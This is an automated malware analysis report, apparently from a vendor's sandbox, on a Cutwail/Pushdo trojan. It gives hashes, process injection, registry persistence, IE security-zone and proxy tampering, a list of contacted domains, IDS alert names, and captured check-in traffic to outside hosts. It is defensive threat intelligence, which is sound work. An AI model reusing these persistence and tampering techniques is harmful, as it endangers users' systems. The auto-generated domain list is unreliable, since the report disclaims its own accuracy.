Gen.Variant.Zusy.80539_368c6271e7

by malwarelabrobot on April 13th, 2014 in Malware Descriptions.

Trojan.Win32.Cutwail.chu (Kaspersky), Gen:Variant.Zusy.80539 (B) (Emsisoft), Gen:Variant.Zusy.80539 (AdAware), GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 368c6271e7c7a0b02a0daa256a2aa283
SHA1: 88c782c4ec6e4456a649d61c863b79a41d57af73
SHA256: 3b9f5ce74cf866baf9a2a209d0ad4b3c25fd85728c0157a2806b011f177dc7b5
SSDeep: 768:4TbKtBVOrAHIR5/fNQuYMqV76ckaZ9Yz2WjEIFoE3AwkV5u9:ZVaz3/fNUVfkarYs 3AwyE9
Size: 48128 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Rapiddown
Created at: 2014-01-16 13:34:07
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1880

The Trojan injects its code into the following process(es):

JRY7B2.tmp:3796
svchost.exe:1876
svchost.exe:2960

File activity

The process %original file name%.exe:1880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The Trojan deletes the following file(s):

The process JRY7B2.tmp:3796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The Trojan deletes the following file(s):

Registry activity

The process %original file name%.exe:1880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"AppManagement" = "7A 52 2A 02 D9 25 FC D4 AC 84 5C 34 0C 57 2F 07"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"zygyspypjyslzap" = "B6 8E 66 3E 89 61 39 11 E8 C0 98 70 BB 93 6B 43"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A A8 EB FC 62 9B 3E 7E DE 90 9D EF DE EE 8E 87"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"ShellPrime" = "F5 B1 58 71"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zygyspypjysl" = "%Documents and Settings%\%current user%\zygyspypjysl.exe"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"AppManagement"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zygyspypjysl"

The process JRY7B2.tmp:3796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\E5215D3460C2C20BBE2D9FE5FB665DAA2C0E225C]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 6F 7E 74 A3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"AppManagement" = "A8 80 58 30 08 DF B7 8F 67 3F 17 EE C6 9E 76 C1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 86 46 3B DF 0F 73 D7 A8 65 AD B9 5C 26 80 FE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"sufkywiddeaxzap" = "88 60 38 10 E7 BF 97 6F 47 1F F6 CE A6 7E 56 2E"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"sufkywiddeax" = "%Documents and Settings%\%current user%\sufkywiddeax.exe"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates]
"E5215D3460C2C20BBE2D9FE5FB665DAA2C0E225C"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"ShellPrime"

Dropped PE files

MD5 File path
0a0dcf2f3b12bc676ca93e49b573690d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\JRY7B2.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy   Section MD5
.text   4096             602           1024      2.78109   113a7c284fcf4456308de7027b6ee820
.rdata  8192             140           512       0.928075  d2db33f388ee0b37fe18425ddae4394a
.data   12288            127           512       0.496935  3b95829f707498578661cb234d47259d
.rsrc   16384            44608         45056     5.12094   d25dfb3c65a8834eb9e88372fdf29552

URLs

ifta.org 204.12.25.10
storci.com 88.149.156.78
www.biurimex.pl 89.161.181.123
ans-service.com 67.227.252.139
lapanthera.hu 195.56.148.119
smtp.live.com 65.55.162.200
alfaglass.ru 195.216.243.44
www.mattiussiecologia.com 95.110.203.75
trenpalau.com
fujino-lab.com
guberman.com.br
nichedictionary.com
meubles-jacquelin.com
felipegarrote.com
academiamc.com
hoyuu.com
isle-karnataka.org
bapasitaramsevatrust.org
x-cellcommunications.de
niray.com.cn
enzoyrodrigo.com.br


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET DNS DNS Query for Suspicious .com.cn Domain
ET TROJAN Backdoor.Win32.Pushdo.s Checkin
ET WEB_CLIENT Possible HTTP 403 XSS Attempt (External Source)
ET TROJAN Possible Compromised Host Sinkhole Cookie Value Snkz
ET POLICY Http Client Body contains pw= in cleartext
ET TROJAN Win32/Cutwail.BE Checkin 2
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 201

Traffic

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 504
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: nanfangcw.com
Connection: Keep-Alive
Cache-Control: no-cache




<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 219
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dotnetpia.co.kr
Connection: Keep-Alive
Cache-Control: no-cache

....,...=[..N..._...px....3..6I...^...s..S...........p......./.. ...<...ML4...I.
_..it
q.............d......$...i#.....A'N 7.c"D..%...&w..(.h.*.-.-.../.. 1.JA3..V5..l7h.9...;.&.=?..?P..AaC.Cr..F...H.`,J..AL..WN.}lP...
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=euc-kr
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ob025wlspo40ycyzbxo5ztlb; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 12 Apr 2014 14:42:08 GMT
Content-Length: 21278

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 47
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: differentimages.nl
Connection: Keep-Alive
Cache-Control: no-cache

..L..R..w.....a.-...........KvB..@......\.W....
HTTP/1.1 302 Moved Permanently
Date: Sat, 12 Apr 2014 14:41:55 GMT
Server: Apache
location: hXXp://ww1.differentimages.nl
X-Powered-By: PleskLin
Content-Length: 0
Connection: close
Content-Type: text/html


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 550
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: victoria.com.pl
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 171
Content-Type: text/html
Date: Sat, 12 Apr 2014 14:40:16 GMT
Server: IdeaWebServer/v0.80
<HTML>.<HEAD>...<TITLE>403 Forbidden</TITLE>..
</HEAD>.<BODY BGCOLOR=#FFFFFF>...<H1>403 Forbidden&l
t;/H1>..You don't have permission to access this document...</BO
DY>.</HTML>...


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.teknorhino.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 12 Apr 2014 14:41:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
3d19..<script>document.write(unescape('"));..
</script>..<script type="text/javascript">..try {..var pag
eTracker = _gat._getTracker("UA-10809384-1");..pageTracker._trackP

<<< skipped >>>

GET /sydney/ HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.optiver.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:41:43 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 558
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: bigjohnsbeefjerky.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: cloudflare-nginx
Date: Sat, 12 Apr 2014 14:40:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d09eade82e09a5211bd069a69b61571511397313626760; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.bigjohnsbeefjerky.com; HttpOnly
Cf-Railgun: direct (starting new WAN connection)
Location: hXXp://VVV.bigjohnsbeefjerky.com/
CF-RAY: 11a02dd743dc0098-IAD

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 534
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: lexjuridica.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:41:49 GMT
Server: Apache
X-SERVER: 33
Last-Modified: Fri, 04 Oct 2013 22:24:11 GMT
ETag: "e130f2-f8b-4e7f1c2f7d8c0"
Accept-Ranges: bytes
Content-Length: 3979
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 550
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thesergery.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.0 400 Bad request: request method denied
Content-type: text/html; charset="utf-8"

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.bocr.cz
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:42:01 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7 squeeze19
Set-Cookie: PHPSESSID=egubaa30odv4qq09os7mpkorj5; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 528
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: shipeliteexpress.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 503 Service Temporarily Unavailable
Server: cloudflare-nginx
Date: Sat, 12 Apr 2014 14:40:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d82c29802f4da99df986786ea85b242221397313645850; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.shipeliteexpress.com; HttpOnly
Cache-Control: max-age=5
Expires: Sat, 12 Apr 2014 14:40:50 GMT
CF-RAY: 11a02e4e9a93087a-IAD

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 468
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: slcago.org
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:40:15 GMT
Server: Apache
Last-Modified: Thu, 08 Aug 2013 22:47:13 GMT
ETag: "21c5f-190-4e37770631e40"
Accept-Ranges: bytes
Content-Length: 400
X-Powered-By: PleskLin
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xml
ns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<title>Americ
an Guild of Organists</title>.<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1" />.<meta http-equiv="re
fresh" content="0;url=hXXp://VVV.slcago.org/main01/" />.</head&g
t;..<body>.</body>..</html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 566
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: robertmcintyre.com.au
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 12 Apr 2014 14:40:26 GMT
Content-Length: 1233

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: screaminpeach.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Sat, 12 Apr 2014 14:40:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d22805e80c79ca447eea8214c754687c61397313616443; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.screaminpeach.com; HttpOnly
CF-RAY: 11a02d96ce0102b8-IAD

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 496
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: churchsupplies.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Date: Sat, 12 Apr 2014 14:40:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 5039
Keep-Alive: timeout=2, max=25
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<<< skipped >>>

GET /v02 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iaiglobal.or.id
Connection: Keep-Alive
Cache-Control: no-cache

GET /v02 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iaiglobal.or.id
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Date: Sat, 12 Apr 2014 14:40:52 GMT
Server: Apache
Location: hXXp://VVV.iaiglobal.or.id/v02/
Vary: Accept-Encoding
Content-Length: 308
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.iaiglobal.or.id/v02/">here
</a>.</p>.<hr>.<address>Apache Server at VVV.i
aiglobal.or.id Port 80</address>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 558
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: neurotoxininstitute.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 503 Service Temporarily Unavailable
Server: cloudflare-nginx
Date: Sat, 12 Apr 2014 14:41:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da1d2d89df205aa1436f42e743221d8681397313705664; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.neurotoxininstitute.com; HttpOnly
Cache-Control: max-age=5
Expires: Sat, 12 Apr 2014 14:41:50 GMT
CF-RAY: 11a02fc46d130844-IAD

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 37
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tobler-skele.bg
Connection: Keep-Alive
Cache-Control: no-cache

..x...*.6~...H....@ G.. ...!.qU"X<.#.
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:41:53 GMT
Server: Apache
Last-Modified: Sun, 23 Mar 2014 10:20:12 GMT
ETag: "44a00c9-5212-4f54376ded315"
Accept-Ranges: bytes
Content-Length: 21010
Keep-Alive: timeout=5, max=5
Connection: Keep-Alive
Content-Type: text/html

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 113
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tobler-skele.bg
Connection: Keep-Alive
Cache-Control: no-cache

....^.v.......W.....C>.......g..e.H......%....s.=O....:..x.._
....e..6....,.o`...[
...p.F.....8........T$.{......
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:41:54 GMT
Server: Apache
Last-Modified: Sun, 23 Mar 2014 10:20:12 GMT
ETag: "44a00c9-5212-4f54376ded315"
Accept-Ranges: bytes
Content-Length: 21010
Keep-Alive: timeout=5, max=4
Connection: Keep-Alive
Content-Type: text/html

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 528
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rueggeberg.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 403 Forbidden
Server: nginx/1.2.1
Date: Sat, 12 Apr 2014 14:40:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 570
Connection: keep-alive
Vary: Accept-Encoding


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 550
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: gamblingonlinemagazine.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 406 Not Acceptable
Date: Sat, 12 Apr 2014 14:41:42 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8i DAV/2 FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
Content-Length: 13
Connection: close
Content-Type: text/html; charset=iso-8859-1
Access Denied..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 570
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sztartufi.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 12 Apr 2014 14:41:27 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: saios.net
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 302 Found
Date: Sat, 12 Apr 2014 14:40:29 GMT
Server: Apache
Location: hXXp://VVV.saios.net/
Content-Length: 205
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>
<head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a
href="hXXp://VVV.saios.net/">here</a>.</p>.</body>
</html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 450
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ezmedi.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 403 Forbidden
Date: Sat, 12 Apr 2014 14:41:46 GMT
Server: Microsoft-IIS/5.0
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
37..[an error occurred while processing this directive]..  ..90....   
You don't have permission to access the requested directory.. Ther
e is either no index document or the directory is read-protected... .
.2......34..[an error occurred while processing this directive]...0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 542
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rewardhits.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently
Server: nginx/1.4.2
Date: Sat, 12 Apr 2014 14:41:26 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 382
Connection: keep-alive
Location: hXXp://VVV.teknorhino.com/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>
<head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.teknorhino.com/">here</
a>.</p>.<hr>.<address>Apache/2.2.25 (Unix) mod_ss
l/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.17 Server
at rewardhits.com Port 80</address>.</body></html>.
..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 133
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qistech.com
Connection: Keep-Alive
Cache-Control: no-cache

...-~7..4.a0.`.1..(3V..4..5..S7xH.8...:...;...=jgx> ..?..?A.%.BB..D.NjE...F.x1H=
.I...Ks..LI1.M..<O..:.^S6R...W.~.T....k..W.?.Y.7.[.
HTTP/1.1 302 Found
Date: Sat, 12 Apr 2014 14:42:05 GMT
